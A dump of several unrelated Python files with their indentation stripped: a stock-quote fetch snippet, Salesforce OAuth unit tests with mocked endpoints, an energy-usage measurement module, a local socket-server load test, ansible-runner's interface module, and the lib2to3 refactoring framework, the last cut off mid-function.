# t = threading.Thread(target=get_real_and_save, args=(stockPart,))
# t.start()
#
#
# print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
# stockCodeList = ['000001','000002','000004','000005','000006']
# stock_list = quotation.gen_stock_list(stockCodeList)
stockRealInfoList = quotation.get_stock_data(stockCodeList)
print(stockRealInfoList)
# 将数据插入到DB中
# for stockRealInfo in stockRealInfoList:
# v = stockRealInfoList[stockRealInfo]
# mysqlUtil.insertTickData(stockRealInfo,None,v['buy'],v['sell'],v['now'],v['open'],v['close'],
# v['high'],v['low'],v['turnover'],v['volume'],v['ask1'],v['ask1_volume'],v['ask2'],
# v['ask2_volume'],v['ask3'],v['ask3_volume'],v['ask4'],v['ask4_volume'],v['ask5'],
# v['ask5_volume'],v['bid1'],v['bid1_volume'],v['bid2'],v['bid2_volume'],v['bid3'],
# v['bid3_volume'],v['bid4'],v['bid4_volume'],v['bid5'],v['bid5_volume'],v['date'],
# v['time'],None)
#
# print(stockRealInfo)
# print('请求数据耗时')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
# stockInfo = quotation.real('000006') # 支持直接指定前缀,如 'sh000001'
# print(stockInfo) |
test_salesforce.py | import http.client
import threading
import time
import unittest
import urllib.error
import urllib.parse
import urllib.request
from unittest import mock
import responses
from cumulusci.oauth.salesforce import SalesforceOAuth2
from cumulusci.oauth.salesforce import CaptureSalesforceOAuth
class TestSalesforceOAuth(unittest.TestCase):
def _create_oauth(self):
return SalesforceOAuth2(
client_id="foo_id",
client_secret="foo_secret",
callback_url="http://localhost:8080",
)
@responses.activate
def test_refresh_token(self):
oauth = self._create_oauth()
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
body=b"SENTINEL",
)
resp = oauth.refresh_token("token")
self.assertEqual(resp.text, "SENTINEL")
@responses.activate
def test_revoke_token(self):
oauth = self._create_oauth()
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/revoke",
status=http.client.OK,
)
resp = oauth.revoke_token("token")
self.assertEqual(200, resp.status_code)
@mock.patch("webbrowser.open", mock.MagicMock(return_value=None))
class TestCaptureSalesforceOAuth(unittest.TestCase):
def _create_oauth(self):
return CaptureSalesforceOAuth(
self.client_id,
self.client_secret,
self.callback_url,
self.auth_site,
self.scope,
)
def setUp(self):
self.client_id = "foo_id"
self.client_secret = "foo_secret"
self.callback_url = "http://localhost:8080"
self.scope = "refresh_token web full"
self.auth_site = "https://login.salesforce.com"
@responses.activate
def test_oauth_flow(self):
# mock response to URL validation
responses.add(
responses.GET,
"https://login.salesforce.com/services/oauth2/authorize",
status=http.client.OK,
)
# mock response for SalesforceOAuth2.get_token()
expected_response = {
u"access_token": u"abc123",
u"id_token": u"abc123",
u"token_type": u"Bearer",
u"signature": u"abc123",
u"issued_at": u"12345",
u"scope": u"{}".format(self.scope),
u"instance_url": u"https://na15.salesforce.com",
u"id": u"https://login.salesforce.com/id/abc/xyz",
u"refresh_token": u"abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# create CaptureSalesforceOAuth instance
o = self._create_oauth()
# call OAuth object on another thread - this spawns local httpd
t = threading.Thread(target=o.__call__)
t.start()
while True:
if o.httpd:
break
print("waiting for o.httpd")
time.sleep(0.01)
# simulate callback from browser
response = urllib.request.urlopen(self.callback_url + "?code=123")
# wait for thread to complete
t.join()
# verify
self.assertEqual(o.response.json(), expected_response)
self.assertEqual(response.read(), b"OK")
@responses.activate
def test_oauth_flow_error_from_auth(self):
# mock response to URL validation
responses.add(
responses.GET,
"https://login.salesforce.com/services/oauth2/authorize",
status=http.client.OK,
)
# mock response for SalesforceOAuth2.get_token()
expected_response = {
u"access_token": u"abc123",
u"id_token": u"abc123",
u"token_type": u"Bearer",
u"signature": u"abc123",
u"issued_at": u"12345",
u"scope": u"{}".format(self.scope),
u"instance_url": u"https://na15.salesforce.com",
u"id": u"https://login.salesforce.com/id/abc/xyz",
u"refresh_token": u"abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# create CaptureSalesforceOAuth instance
o = self._create_oauth()
# call OAuth object on another thread - this spawns local httpd
t = threading.Thread(target=o.__call__)
t.start()
while True:
if o.httpd:
break
print("waiting for o.httpd")
time.sleep(0.01)
# simulate callback from browser
with self.assertRaises(urllib.error.HTTPError):
urllib.request.urlopen(
self.callback_url + "?error=123&error_description=broken"
)
# wait for thread to complete
t.join()
@responses.activate
def test_oauth_flow_error_from_token(self):
# mock response to URL validation
responses.add(
responses.GET,
"https://login.salesforce.com/services/oauth2/authorize",
status=http.client.OK,
)
# mock response for SalesforceOAuth2.get_token()
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.FORBIDDEN,
)
# create CaptureSalesforceOAuth instance
o = self._create_oauth()
# call OAuth object on another thread - this spawns local httpd
t = threading.Thread(target=o.__call__)
t.start()
while True:
if o.httpd:
break
print("waiting for o.httpd")
time.sleep(0.01)
# simulate callback from browser
with self.assertRaises(urllib.error.HTTPError):
urllib.request.urlopen(self.callback_url + "?code=123")
# wait for thread to complete
t.join()
|
evaluate.py | import time
import statistics
from timeit import default_timer as timer
from multiprocessing import Process, Queue
import os
import datetime
import subprocess
import queue
import energyusage.utils as utils
import energyusage.convert as convert
import energyusage.locate as locate
import energyusage.report as report
DELAY = .1 # in seconds
def func(user_func, q, *args):
""" Runs the user's function and puts return value in queue """
value = user_func(*args)
q.put(value)
def energy(user_func, *args, powerLoss = 0.8, printToScreen):
""" Evaluates the kwh needed for your code to run
Parameters:
user_func (function): user's function
Returns:
(process_kwh, return_value, watt_averages)
"""
baseline_check_seconds = 5
files, multiple_cpus = utils.get_files()
is_nvidia_gpu = utils.valid_gpu()
is_valid_cpu = utils.valid_cpu()
# GPU handling if Nvidia
gpu_baseline =[0]
gpu_process = [0]
bash_command = "nvidia-smi -i 0 --format=csv,noheader --query-gpu=power.draw"
for i in range(int(baseline_check_seconds / DELAY)):
if is_nvidia_gpu:
output = subprocess.check_output(['bash','-c', bash_command])
output = float(output.decode("utf-8")[:-2])
gpu_baseline.append(output)
if is_valid_cpu:
files = utils.measure_files(files, DELAY)
files = utils.update_files(files)
else:
time.sleep(DELAY)
# Adds the most recent value of GPU; 0 if not Nvidia
last_reading = utils.get_total(files, multiple_cpus) + gpu_baseline[-1]
if last_reading >=0:
utils.log("Baseline wattage", last_reading)
if printToScreen:
utils.newline()
# Running the process and measuring wattage
q = Queue()
p = Process(target = func, args = (user_func, q, *args,))
start = timer()
p.start()
small_delay_counter = 0
return_value = None
while(p.is_alive()):
# Checking at a faster rate for quick processes
if (small_delay_counter > DELAY):
delay = DELAY / 10
small_delay_counter+=1
else:
delay = DELAY
if is_nvidia_gpu:
output = subprocess.check_output(['bash','-c', bash_command])
output = float(output.decode("utf-8")[:-2])
gpu_process.append(output)
if is_valid_cpu:
files = utils.measure_files(files, delay)
files = utils.update_files(files, True)
else:
time.sleep(delay)
# Just output, not added
last_reading = (utils.get_total(files, multiple_cpus) + gpu_process[-1]) / powerLoss
if last_reading >=0:
utils.log("Process wattage", last_reading)
# Getting the return value of the user's function
try:
return_value = q.get_nowait()
break
except queue.Empty:
pass
p.join()
end = timer()
for file in files:
file.process = file.process[1:-1]
file.baseline = file.baseline[1:-1]
if is_nvidia_gpu:
gpu_baseline_average = statistics.mean(gpu_baseline[2:-1])
gpu_process_average = statistics.mean(gpu_process[2:-1])
else:
gpu_baseline_average = 0
gpu_process_average = 0
total_time = end-start # seconds
# Formatting the time nicely
timedelta = str(datetime.timedelta(seconds=total_time)).split('.')[0]
files = utils.average_files(files)
process_average = utils.get_process_average(files, multiple_cpus, gpu_process_average)
baseline_average = utils.get_baseline_average(files, multiple_cpus, gpu_baseline_average)
difference_average = process_average - baseline_average
watt_averages = [baseline_average, process_average, difference_average]
# Subtracting baseline wattage to get more accurate result
process_kwh = convert.to_kwh((process_average - baseline_average)*total_time) / powerLoss
if is_nvidia_gpu:
gpu_file = file("GPU", "")
gpu_file.create_gpu(gpu_baseline_average, gpu_process_average)
files.append(file("GPU", ""))
# Logging
utils.log("Final Readings", baseline_average, process_average, difference_average, timedelta)
return (process_kwh, return_value, watt_averages, files, total_time)
def energy_mix(location, location_of_default):
""" Gets the energy mix information for a specific location
Parameters:
location (str): user's location
location_of_default (str): Specifies which average to use if
location cannot be determined
Returns:
breakdown (list): percentages of each energy type
"""
if location == "Unknown":
if location_of_default == "USAverage":
location = "United States"
elif location_of_default == "EuropeAverage":
location = "Europe"
else:
location = "World"
if locate.in_US(location):
# Default to U.S. average for unknown location
data = utils.get_data("data/json/energy-mix-us.json")
s = data[location]['mix'] # get state
coal, oil, gas = s['coal'], s['oil'], s['gas']
nuclear, hydro, biomass, wind, solar, geo, = \
s['nuclear'], s['hydro'], s['biomass'], s['wind'], \
s['solar'], s['geothermal']
low_carbon = sum([nuclear,hydro,biomass,wind,solar,geo])
breakdown = [coal, oil, gas, low_carbon]
return breakdown # list of % of each
else:
data = utils.get_data('data/json/energy-mix-intl.json')
c = data[location] # get country
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
# Get percentages
breakdown = list(map(lambda x: 100*x/total, breakdown))
return breakdown # list of % of each
def emissions(process_kwh, breakdown, location, location_of_default):
""" Calculates the CO2 emitted by the program based on the location
Parameters:
process_kwh (int): kWhs used by the process
breakdown (list): energy mix corresponding to user's location
location (str): location of user
Returns:
emission (float): kilograms of CO2 emitted
state_emission (float): lbs CO2 per MWh
"""
if process_kwh < 0:
raise OSError("Process wattage lower than baseline wattage. Do not run other processes"
" during the evaluation, or try evaluating a more resource-intensive process.")
utils.log("Energy Data", breakdown, location, location_of_default)
state_emission = 0
# Case 1: Unknown location, default to US data
# Case 2: United States location
if locate.in_US(location):
if location == "Unknown":
location = "United States"
# US Emissions data is in lbs/Mwh
data = utils.get_data("data/json/us-emissions.json")
state_emission = data[location]
emission = convert.lbs_to_kgs(state_emission*convert.to_MWh(process_kwh))
# Case 3: International location
else:
# Breaking down energy mix
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
utils.log("Emissions", emission)
return (emission, state_emission)
def emissions_comparison(process_kwh):
""" Calculates emissions in different locations """
intl_data = utils.get_data("data/json/energy-mix-intl.json")
global_emissions, europe_emissions, us_emissions = [], [], []
# Handling international
for country in intl_data:
c = intl_data[country]
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
if isinstance(total, float) and float(total) > 0:
breakdown = list(map(lambda x: 100*x/total, breakdown))
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
if locate.in_Europe(country):
europe_emissions.append((country,emission))
else:
global_emissions.append((country,emission))
global_emissions.sort(key=lambda x: x[1])
europe_emissions.sort(key=lambda x: x[1])
# Handling US
us_data = utils.get_data("data/json/us-emissions.json")
for state in us_data:
if (state != "United States" and state != "_units"):
emission = convert.lbs_to_kgs(us_data[state]*convert.to_MWh(process_kwh))
us_emissions.append((state, emission))
us_emissions.sort(key=lambda x: x[1])
max_global, max_europe, max_us = global_emissions[len(global_emissions)-1], \
europe_emissions[len(europe_emissions)-1], us_emissions[len(us_emissions)-1]
median_global, median_europe, median_us = global_emissions[len(global_emissions)//2], \
europe_emissions[len(europe_emissions)//2], us_emissions[len(us_emissions)//2]
min_global, min_europe, min_us= global_emissions[0], europe_emissions[0], us_emissions[0]
utils.log('Emissions Comparison', max_global, median_global, min_global, max_europe, \
median_europe, min_europe, max_us, median_us, min_us)
def evaluate(user_func, *args, pdf=False, powerLoss=0.8, energyOutput=False, \
location_of_default = "GlobalAverage", printToScreen = True):
""" Calculates effective emissions of the function
Parameters:
user_func: user inputtted function
pdf (bool): whether a PDF report should be generated
powerLoss (float): PSU efficiency rating
"""
utils.setGlobal(printToScreen)
if (utils.valid_cpu() or utils.valid_gpu()):
location = locate.get(printToScreen)
result, return_value, watt_averages, files, total_time = energy(user_func, *args, powerLoss=powerLoss, \
printToScreen = printToScreen)
breakdown = energy_mix(location, location_of_default)
emission, state_emission = emissions(result, breakdown, location, location_of_default)
utils.log("Assumed Carbon Equivalencies")
emissions_comparison(result)
utils.log("Process Energy", result)
if pdf:
report.generate(location, watt_averages, breakdown, emission, state_emission)
if energyOutput:
return (total_time, result, return_value)
else:
return return_value
else:
utils.log("The energy-usage package only works on Linux kernels "
"with Intel processors that support the RAPL interface and/or machines with"
" an Nvidia GPU. Please try again on a different machine.")
|
test.py | #!/bin/env python3
import esockets
import threading
import socket
import time
import logging
import sys
from time import sleep
import maxthreads
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
class Client:
def __init__(self, server):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.connect((server.host, server.port))
def handle_incoming(client, address):
return True
def handle_readable(client):
data = client.recv(1028)
print(threading.active_count())
# print(data)
if data == b'':
return False
return True
server = esockets.SocketServer(handle_incoming=handle_incoming,
handle_readable=handle_readable,
max_subthreads=100)
server.start()
clients = []
send_threads = maxthreads.MaxThreads(100)
for i in range(200):
clients.append(Client(server))
def send_from_all(msg):
for i in clients:
send_threads.start_thread(target=i.sock.sendall,
args=(msg.encode(),))
# sockets = []
#
# def connect(lock, n):
# for i in range(n):
# conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# conn.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# conn.connect((server.host, server.port))
# sockets.append(conn)
#
# lock.release()
#
#
# def send():
# for s in sockets:
# s.sendall(b'Hello from client!')
#
# def mass_send():
# while True:
# send()
#
# def sample(seconds, no_samples):
# samples = []
# time1 = time.time()
# while time.time() - time1 < seconds:
# t1 = time.time()
# samples.append(threading.active_count())
# t2 = time.time() - t1
# sleep(seconds/no_samples - t2)
# return samples
#
# conn_lock = threading.Lock()
# conn_lock.acquire()
# threading.Thread(target=connect, args=(conn_lock, 4000)).start()
# conn_lock.acquire()
# threading.Thread(target=mass_send).start()
#
# print('Sampling')
# samples = sample(5, 2000)
# plt.plot(samples)
# plt.show()
|
interface.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import threading
import logging
from ansible_runner import output
from ansible_runner.runner_config import RunnerConfig
from ansible_runner.runner import Runner
from ansible_runner.utils import dump_artifacts
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
dump_artifacts(kwargs)
output.configure()
debug = kwargs.pop('debug', None)
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
logfile = kwargs.pop('logfile', None)
if logfile:
output.set_logfile(logfile)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param inventory: Overridees the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Commnad line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type cmdline: str
:type quiet: bool
:type verbosity: int
:returns: A :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
|
refactor.py | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import pkgutil
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fix_names = []
for finder, name, ispkg in pkgutil.iter_modules(pkg.__path__):
if name.startswith("fix_"):
if remove_prefix:
name = name[4:]
fix_names.append(name)
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline='') as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
